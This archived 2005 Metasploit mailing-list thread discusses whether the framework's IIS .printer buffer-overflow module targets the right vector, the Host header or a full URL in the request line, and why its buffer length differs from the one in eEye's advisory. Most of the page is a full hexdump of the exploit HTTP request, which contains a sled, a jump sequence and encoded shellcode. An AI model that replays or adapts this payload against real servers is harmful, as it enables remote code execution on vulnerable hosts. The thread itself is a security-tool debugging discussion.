Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

[BUG] please confirm

From: jwasser at skaion.com (John Wasser)
Date: Wed, 13 Apr 2005 14:34:43 -0400
The 'Check' code seems to be modeled after the original 'proof of
concept' code from eEye as shown here:
http://security-protocols.com/modules.php?name=News&file=print&sid=1536

The 'Exploit' code seems to be modeled after this exploit:
http://personal.telefonica.terra.es/web/alexb/e/iisx.c

I think it is possible that:

    GET /NULL.printer HTTP/1.0\r\nHost:SOME.HOST.NAME\r\n\r\n

and 

   GET http://SOME.HOST.NAME/NULL.printer HTTP/1.0\r\n\r\n

are functionally equivalent and therefor go through the same buffer.

One bit that confuses me is that the vulnerable buffer is supposed to
require 'about' 420 characters to overflow but the exploit code uses
only 271.

On Tue, 2005-04-12 at 23:00 -0700, Null Device wrote:

This is wrt to the last mail i sent. 
for IIS Printer vulnerability.
The links given are.
http://www.osvdb.org/548 {This is invalid link }
and 
http://seclists.org/lists/bugtraq/2001/May/0011.html
{points to a thread of openssl vulnerabilities}.

Apart from this, i think the exploit for printer
vulnerability is not the appropriate exploit. please
reffer to my previous mail for details.

Here i am attaching hexdump of the data that is sent
by metasploit for exploiting printer vulnerability.

=============================================
hexdump follows
============================================
00000000  47 45 54 20 68 74 74 70  3a 2f 2f 4e 46 41
40 4e GET http ://NFA at N
00000010  49 49 4e 92 93 27 4f 99  47 9b 47 99 41 41
49 9f IIN..'O. G.G.AAI.
00000020  97 f8 f5 90 f8 43 43 47  96 41 fd 4e 93 97
91 41 .....CCG .A.N...A
00000030  4f 46 43 93 4b 4b 96 37  91 40 4b d6 f9 48
96 97 OFC.KK.7 . at K..H..
00000040  47 93 37 49 4e 48 f8 fd  43 4e f5 91 f8 98
93 99 G.7INH.. CN......
00000050  90 43 9f 97 d6 9b 46 4b  4b 49 d6 91 41 43
97 9b .C....FK KI..AC..
00000060  f8 46 4b 92 99 91 90 46  d6 41 f8 4f fc 4f
42 d6 .FK....F .A.O.OB.
00000070  98 9b f8 93 9f 90 93 42  99 98 4a 9f 4e 40
4e 41 .......B ..J.N at NA
00000080  27 48 f5 40 42 49 41 9b  90 41 47 f9 99 4b
90 93 'H. at BIA. .AG..K..
00000090  4f 42 d6 4e 96 98 41 97  91 93 37 41 fd f9
42 f5 OB.N..A. ..7A..B.
000000A0  98 27 9f 4f f9 27 f8 91  47 91 27 4b 99 41
46 4b .'.O.'.. G.'K.AFK
000000B0  4b f9 49 f9 41 42 9f 91  fc 42 d6 91 fd 40
98 fc K.I.AB.. .B... at ..
000000C0  97 f9 96 90 91 48 97 f9  46 37 46 fc 97 96
f9 92 .....H.. F7F.....
000000D0  d6 4e 9f fd 4b f9 41 fd  4a f8 96 92 41 f8
f8 42 .N..K.A. J...A..B
000000E0  4a 98 37 37 9f 97 4b 47  f8 49 40 49 90 f9
f5 97 J.77..KG .I at I....
000000F0  fd 9b 43 27 41 fc f8 9b  d6 43 46 27 37 fd
90 37 ..C'A... .CF'7..7
00000100  90 92 4f 49 37 48 90 43  43 4a 4f 4a 97 98
93 4e ..OI7H.C CJOJ...N
00000110  97 40 37 48 4a fc 49 f3  45 2c 73 41 4e d6
91 27 . at 7HJ.I. E,sAN..'
00000120  46 97 fd 8b 4b 60 80 c1  40 80 c5 01 ff e1
2f 6e F...K`.. @...../n
00000130  75 6c 6c 2e 70 72 69 6e  74 65 72 3f 42 40
41 93 ull.prin ter?B at A.
00000140  46 4f 99 96 27 fc f5 97  f9 93 f5 9f fc 48
92 97 FO..'... .....H..
00000150  90 41 93 27 f8 49 27 4e  91 fd 4b 4b 9f 92
46 49 .A.'.I'N ..KK..FI
00000160  27 46 47 27 fd 93 99 96  48 47 91 96 40 f9
98 43 'FG'.... HG.. at ..C
00000170  fd fc 99 99 9b 37 fc 4e  27 27 96 99 d6 47
93 fc .....7.N ''...G..
00000180  40 49 f5 91 4b 27 9f d6  4a 47 46 48 4b 43
41 42 @I..K'.. JGFHKCAB
00000190  f8 48 f9 f9 f5 f5 97 f9  42 47 9f 4e 9f 97
4f 9f .H...... BG.N..O.
000001A0  41 f5 46 43 f5 40 97 47  90 40 49 40 9f f9
4e fc A.FC. at .G . at I@..N.
000001B0  48 48 93 4b f9 48 fc 48  93 99 98 99 98 49
f8 97 HH.K.H.H .....I..
000001C0  47 27 37 43 d6 4b f5 f8  4e f5 f8 99 40 d6
46 46 G'7C.K.. N... at .FF
000001D0  90 90 fc 91 93 4b 48 92  93 96 99 91 f8 37
fc 37 .....KH. .....7.7
000001E0  f9 f5 4f 97 48 4a 9f d6  f8 48 4f 4e 40 4f
40 f5 ..O.HJ.. .HON at O@.
000001F0  4f 98 fd 43 4b d6 91 37  40 48 42 49 4a 47
4f fd O..CK..7 @HBIJGO.
00000200  27 fd 96 42 49 27 91 4a  9f fd fc 46 96 27
47 d6 '..BI'.J ...F.'G.
00000210  f9 9f 96 4a 92 97 27 4f  96 fd 43 96 9b f5
4f 4b ...J..'O ..C...OK
00000220  91 93 f5 40 4a fc f9 42  41 4e 47 91 43 4a
98 4a ... at J..B ANG.CJ.J
00000230  99 43 4b 27 99 fc 90 92  37 93 fc 47 41 90
f8 40 .CK'.... 7..GA..@
00000240  49 f5 f9 91 93 d6 90 93  91 49 91 43 99 48
97 96 I....... .I.C.H..
00000250  43 42 41 99 97 d6 42 4f  41 91 92 f9 9f d6
f8 f9 CBA...BO A.......
00000260  f9 49 d6 d6 96 90 40 4e  fc 4e 4b 97 46 4b
37 47 .I.... at N .NK.FK7G
00000270  90 92 96 49 4a 9f 41 27  41 f9 92 9b 48 43
46 4a ...IJ.A' A...HCFJ
00000280  40 d6 49 d6 4a 46 4b 47  98 9f 4f 42 41 9b
4b 97 @.I.JFKG ..OBA.K.
00000290  f5 4b f8 f5 42 43 37 98  98 f5 4a 4a 91 91
98 fd .K..BC7. ..JJ....
000002A0  f5 41 41 97 99 f8 47 47  96 37 fc f9 93 41
9f 92 .AA...GG .7...A..
000002B0  92 37 37 d6 d6 93 47 97  99 27 9f 4e 91 9f
f8 f8 .77...G. .'.N....
000002C0  4f 4b 42 f9 99 92 41 40  90 46 96 4e 37 93
d6 91 OKB...A@ .F.N7...
000002D0  47 f9 fd 46 47 91 4f f5  90 4f 9b 47 f8 43
42 41 G..FG.O. .O.G.CBA
000002E0  4e 97 49 4a 9f 97 d6 99  d6 97 4a 4e 49 43
97 4e N.IJ.... ..JNIC.N
000002F0  93 97 9f 49 4a 92 97 fd  4e 91 46 97 4a d6
98 41 ...IJ... N.F.J..A
00000300  9b 42 4a 47 4b fc 97 4e  47 42 98 49 4e 4f
91 43 .BJGK..N GB.INO.C
00000310  47 91 99 92 96 d6 48 96  27 97 49 42 93 f9
d6 d6 G.....H. '.IB....
00000320  98 97 43 47 4f f5 4f 47  42 99 90 37 fd 48
4f 90 ..CGO.OG B..7.HO.
00000330  f5 4b f5 48 98 f8 98 9f  92 4b 46 92 37 98
90 4b .K.H.... .KF.7..K
00000340  98 98 37 47 fc 91 4b 49  fc 90 f9 99 37 4a
43 f9 ..7G..KI ....7JC.
00000350  9f 92 fd 4e 4f fd 47 90  42 49 42 f5 9b 9b
40 41 ...NO.G. BIB... at A
00000360  48 48 49 96 37 96 6a 51  59 d9 ee d9 74 24
f4 5b HHI.7.jQ Y...t$.[
00000370  81 73 13 92 39 51 b2 83  eb fc e2 f4 6e 53
ba fd .s..9Q.. ....nS..
00000380  7a c0 ae 4d 6d 59 da de  b6 1d da f7 ae b2
2d b7 z..MmY.. ......-.
00000390  ea 38 be 39 dd 21 da ed  b2 38 ba 51 a2 70
da 86 .8.9.!.. .8.Q.p..
000003A0  19 38 bf 83 52 a0 fd 36  52 4d 56 73 58 34
50 70 .8..R..6 RMVsX4Pp
000003B0  79 cd 6a e6 b6 11 24 51  19 66 75 b3 79 5f
da be y.j...$Q .fu.y_..
000003C0  d9 b2 0e ae 93 d2 52 9e  19 b0 3d 96 8e 58
92 83 ......R. ..=..X..
000003D0  52 5d da f2 a2 b2 11 be  19 49 4d 1f 19 79
59 ec R]...... .IM..yY.
000003E0  fa b7 1f bc 7e 69 ae 64  a3 e2 37 e1 f4 51
62 80 ....~i.d ..7..Qb.
000003F0  fa 4e 22 80 cd 6d ae 62  fa f2 bc 4e a9 69
ae 64 .N"..m.b ...N.i.d
00000400  cd b0 b4 d4 13 d4 59 b0  c7 53 53 4d 42 51
88 bb ......Y. .SSMBQ..
00000410  67 94 06 4d 44 6a 02 e1  c1 6a 12 e1 d1 6a
ae 62 g..MDj.. .j...j.b
00000420  f4 51 40 ee f4 6a d8 53  07 51 f5 a8 e2 fe
06 4d .Q at ..j.S .Q.....M
00000430  44 53 41 e3 c7 c6 81 da  36 94 7f 5b c5 c6
87 e1 DSA..... 6..[....
00000440  c7 c6 81 da 77 70 d7 fb  c5 c6 87 e2 c6 6d
04 4d ....wp.. .....m.M
00000450  42 aa 39 55 eb ff 28 e5  6d ef 04 4d 42 5f
3b d6 B.9U..(. m..MB_;.
00000460  f4 51 32 df 1b dc 3b e2  cb 10 9d 3b 75 53
15 3b .Q2...;. ...;uS.;
00000470  70 08 91 41 38 c7 13 9f  6c 7b 7d 21 1f 43
69 19 p..A8... l{}!.Ci.
00000480  39 92 39 c0 6c 8a 47 4d  e7 7d ae 64 c9 6e
03 e3 9.9.l.GM .}.d.n..
00000490  c3 68 3b b3 c3 68 04 e3  6d e9 39 1f 4b 3c
9f e1 .h;..h.. m.9.K<..
000004A0  6d ef 3b 4d 6d 0e ae 62  19 6e ad 31 56 5d
ae 64 m.;Mm..b .n.1V].d
000004B0  c0 c6 81 da 62 b3 55 ed  c1 c6 87 4d 42 39
51 b2 ....b.U. ...MB9Q.
000004C0  20 48 54 54 50 2f 31 2e  30 0d 0a 0d 0a     
     HTTP/1. 0....
===============================================
hexdump
===============================================

no where i see refrence to Host header which is the
vulnerable vector for this vulnerability.

anyone who can confirm this?

hdm, spoonm?

--ND


              
__________________________________ 
Do you Yahoo!? 
Yahoo! Small Business - Try our new resources site!
http://smallbusiness.yahoo.com/resources/
Previous By Date Next
Previous By Thread Next

Current thread: